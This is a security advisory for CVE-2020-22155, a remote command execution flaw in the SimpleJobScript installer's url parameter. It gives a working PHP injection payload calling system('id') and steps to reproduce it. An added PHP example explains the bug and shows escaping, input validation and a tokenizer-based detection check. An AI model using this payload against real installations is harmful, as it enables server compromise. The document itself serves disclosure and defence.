CVE-2020-22155
The installer of SimpleJobScript is vulnerable to Remote Command Execution through the parameter url if the installation has not been completed yet.
- mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22155
- public announcement: https://github.com/niteosoft/simplejobscript/issues/8
Description:
The installer of SimpleJobScript is vulnerable to Remote Command Execution through the parameter url if the installation has not been completed yet.
Details:
URL: /installer.php
Parameter: url
Payload:
url=example.com'.system('id').'&host=127.0.0.1&port=3306&username=test&password=test&db_name=sjs&submit=Save
Steps to Reproduce:
1/ Download and extract the SimpleJobScript archive in the server web directory:
https://simplejobscript.com/downloads/category/products/
2/ Run the installer
3/ If the installation process has never been completed before, you will be prompted with a form to submit the database information
4/ In the App Url input, enter the following payload and submit: example.com'.system('id').'
5/ Visit with your browser: /_config/config.envs.php
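Why the single quote in the payload matters, and one way to write the setting safely, shown as an added example that is not SimpleJobScript's code. It assumes the installer places the submitted url value between single quotes in the PHP config file named in step 5; the function names and the APP_URL constant are hypothetical.

```php
<?php
// Added example, not SimpleJobScript code. Assumption: the installer pastes the
// submitted "url" field into a PHP config file that the application later includes.

// Hypothetical vulnerable pattern: the value sits between single quotes, so a
// quote in the input ends the string and what follows is parsed as PHP code.
function render_config_unsafe(string $url): string
{
    return "<?php\ndefine('APP_URL', '" . $url . "');\n";
}

// Hardened form: accept only host[:port][/path] characters, then let
// var_export() emit the PHP string literal with quotes and backslashes escaped.
function render_config_safe(string $url): string
{
    if (!preg_match('~^[a-z0-9.-]+(:\d{1,5})?(/[a-z0-9._/-]*)?\z~i', $url)) {
        throw new InvalidArgumentException('App URL contains unexpected characters');
    }
    return "<?php\ndefine('APP_URL', " . var_export($url, true) . ");\n";
}

// Review/detection check: true only when the file is one define() call with two
// string literals. Any extra token (concatenation, a function call) fails it.
function config_is_inert(string $php): bool
{
    $kinds = [];
    foreach (token_get_all($php) as $tok) {
        $id = is_array($tok) ? $tok[0] : $tok;
        if ($id !== T_WHITESPACE && $id !== T_OPEN_TAG) {
            $kinds[] = $id;
        }
    }
    return $kinds === [T_STRING, '(', T_CONSTANT_ENCAPSED_STRING, ',',
                       T_CONSTANT_ENCAPSED_STRING, ')', ';'];
}

$payload = "example.com'.system('id').'"; // url value quoted in the advisory
// The generated text is only tokenized here, never executed.
var_dump(config_is_inert(render_config_unsafe('example.com')));
var_dump(config_is_inert(render_config_unsafe($payload)));
try {
    render_config_safe($payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
var_dump(config_is_inert(render_config_safe('example.com')));
```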
PoC: